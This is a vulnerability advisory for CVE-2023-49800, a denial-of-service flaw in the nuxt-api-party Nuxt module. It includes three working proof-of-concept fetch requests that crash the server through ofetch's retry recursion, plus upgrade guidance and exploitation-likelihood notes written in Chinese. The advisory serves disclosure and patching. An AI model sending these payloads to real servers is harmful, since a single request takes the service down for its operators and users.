CVE-2023-49800
DOS by abusing `fetchOptions.retry`.
描述
### Summary `nuxt-api-party` allows developers to proxy requests to an API without exposing credentials to the client. [`ofetch`](https://github.com/unjs/ofetch) is used to send the requests. The library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow. ### Details `fetchOptions` [are obtained directly from the request body](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L27). These are then [passed directly into `ofetch` ](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L57C15-L57C15). We can construct a URL we know will not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively. ### PoC POC using Node. ```js await fetch("http://localhost:3000/api/__api_party/MyEndpoint", { method: "POST", body: JSON.stringify({ path: "x:x", retry: 9999999 }), headers: { "Content-Type": "application/json" } }) ``` We can use `__proto__` as a substitute for the endpoint if it is not known. ```js await fetch("http://localhost:3000/api/__api_party/__proto__", { method: "POST", body: JSON.stringify({ path: "x:x", retry: 9999999 }), headers: { "Content-Type": "application/json" } }) ``` We can build the size of the stack faster by using more complicated URIs ```js await fetch("http://localhost:3000/api/__api_party/__proto__", { method: "POST", body: JSON.stringify({ path: "data:x;base64,----", retry: 9999999 }), headers: { "Content-Type": "application/json" } }) ``` ### Impact Full DOS, server is unusable during attack. Requires a single request. ### Fix Limit which options can be passed to `ofetch`.
如何修補 CVE-2023-49800
要修補 CVE-2023-49800,請將受影響套件升級到下列已修補版本。
- —升級至 0.22.1 或更新版本
CVE-2023-49800 正在被利用嗎?
低 — EPSS 為 1.1%,目前沒有觀察到大規模利用活動。